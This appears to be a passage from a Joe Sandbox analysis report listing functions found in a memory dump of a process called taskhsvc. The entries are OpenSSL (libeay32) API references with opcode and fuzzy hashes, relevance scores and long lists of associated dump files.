                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $ $ $
                                                            • API String ID: 0-2376886710
                                                            • Opcode ID: f225506dd347c59c8da16f945bff169f4b8ff24c9c3cf8b91f86100df37a8e92
                                                            • Instruction ID: 2cbf082231b7af9c36e78646193649df0811c4dd31563a9ff7b819672a67c578
                                                            • Opcode Fuzzy Hash: f225506dd347c59c8da16f945bff169f4b8ff24c9c3cf8b91f86100df37a8e92
                                                            • Instruction Fuzzy Hash: 62A108757083008FD714DF29C68065BBBF5BBCA308F158A2EE9A997740D731EA058B83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3AE50 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$T$V
                                                            • API String ID: 0-4191120472
                                                            • Opcode ID: cdcef55a85dc1a00e9ca610a25ce4bd63ea79d9afdddb4fb0607a880d4f61162
                                                            • Instruction ID: 0766cb97468d2dd3ef01179d979cb8283681d021558fe0d43a3c54e36269c22f
                                                            • Opcode Fuzzy Hash: cdcef55a85dc1a00e9ca610a25ce4bd63ea79d9afdddb4fb0607a880d4f61162
                                                            • Instruction Fuzzy Hash: 0851CFB06057119BEB00DF29C59475BBBE4BF44308F11895CE9A88F68AD779D848CFE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3E550 Relevance: 16.7, APIs: 11, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509v3_add_ext__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1067766642-0
                                                            • Opcode ID: 5f7a208edf7d6aaf9d8d7ef6aee689189498d7489bfd90ddb26c07d264ec7ceb
                                                            • Instruction ID: 11e6861075de1caa0538636f25a70e2e1541ca4a1120622af899b9f18d294407
                                                            • Opcode Fuzzy Hash: 5f7a208edf7d6aaf9d8d7ef6aee689189498d7489bfd90ddb26c07d264ec7ceb
                                                            • Instruction Fuzzy Hash: 4081D3756187109FC704DF69C68090ABBF1BF8D318F469A5DEA99AB310D334EA01CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBEFB0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$j
                                                            • API String ID: 1767461275-3507651435
                                                            • Opcode ID: eb716ae5ef4001146e69d905c15cf33c45a57ea0a1b302869fa4fc93beec6f05
                                                            • Instruction ID: b0a5cd6c64dc37676f77b3dc2d6d7c7f5bd9b1da88643b27fc531896610b9acc
                                                            • Opcode Fuzzy Hash: eb716ae5ef4001146e69d905c15cf33c45a57ea0a1b302869fa4fc93beec6f05
                                                            • Instruction Fuzzy Hash: 2331D5BA5193059FE7409F25C54571BBBF0AB80398F11CC1CE8985B760D3BEE54A8F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF24F70 Relevance: 15.2, APIs: 10, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4605ab27efe0155dd52eeb1b5ddc395a3d79e4db0c2b1260c45393769cf9af0f
                                                            • Instruction ID: 0dd6460110ca39bdd2c4638daa3a2b3ae52317e4d976b1394db70347d86d8d61
                                                            • Opcode Fuzzy Hash: 4605ab27efe0155dd52eeb1b5ddc395a3d79e4db0c2b1260c45393769cf9af0f
                                                            • Instruction Fuzzy Hash: 6FA1F2756093458FD724CFA9C080A9BBBF1BF89304F61892DE9989B714E775E805CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE26CA0 Relevance: 15.1, APIs: 10, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_new_nullsk_numsk_push
                                                            • String ID:
                                                            • API String ID: 2969076029-0
                                                            • Opcode ID: dfd611522169556d39384b724ba0dd4500ad9118010d08dda10d7f4035f297ce
                                                            • Instruction ID: a0c6e24bea90f43c5a64aee336141058e2d78478da0ad4bd41fa4606e852ef3f
                                                            • Opcode Fuzzy Hash: dfd611522169556d39384b724ba0dd4500ad9118010d08dda10d7f4035f297ce
                                                            • Instruction Fuzzy Hash: 753104706097459BDB40EF35C68074BBBF8BF89348F269A1CE994CB700E735E9058B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEE2F30 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: o$|
                                                            • API String ID: 1767461275-345082302
                                                            • Opcode ID: 9a606b7877471b2d0255f441c09648bdb06d5f4586554bb1bb8d81c2fc6cd22e
                                                            • Instruction ID: 5464bc8a6998ac970e39dce57563475ac2dc78c994c61b688ac8baa94f092f42
                                                            • Opcode Fuzzy Hash: 9a606b7877471b2d0255f441c09648bdb06d5f4586554bb1bb8d81c2fc6cd22e
                                                            • Instruction Fuzzy Hash: 00518C712057468BDB00DF28C48575BBBF1BF89388F25CA6CE8988BB94D775E904CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6C850 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF6C8BB
                                                            • EVP_CIPHER_CTX_block_size.LIBEAY32 ref: 6CF6C8F4
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF6C90E
                                                            • EVP_CipherUpdate.LIBEAY32 ref: 6CF6C938
                                                            • EVP_CipherFinal_ex.LIBEAY32 ref: 6CF6C953
                                                            • EVP_CIPHER_CTX_cleanup.LIBEAY32 ref: 6CF6C97B
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF6C9A3
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6C9CF
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6CA07
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF6CA23
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6CA4F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6CA87
                                                            • EVP_PBE_CipherInit.LIBEAY32 ref: 6CF6C8E4
                                                              • Part of subcall function 6CEF3070: OBJ_obj2nid.LIBEAY32 ref: 6CEF30BD
                                                              • Part of subcall function 6CEF3070: ERR_put_error.LIBEAY32 ref: 6CEF30F1
                                                              • Part of subcall function 6CEF3070: i2t_ASN1_OBJECT.LIBEAY32 ref: 6CEF3111
                                                              • Part of subcall function 6CEF3070: ERR_add_error_data.LIBEAY32 ref: 6CEF3129
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$Cipher$O_free$Final_exInitJ_obj2nidO_mallocR_add_error_dataUpdateX_block_sizeX_cleanupX_initi2t_
                                                            • String ID: e$j$j$l$u
                                                            • API String ID: 77179880-1386408374
                                                            • Opcode ID: a4062dd3ae0b340409a700c8245888c8c6db627f5a9576bf76f03c3a45acd17d
                                                            • Instruction ID: 70380aca0dcf6b5e94422100feaaad7824b9d7fd657469d4ef6e666466519dfa
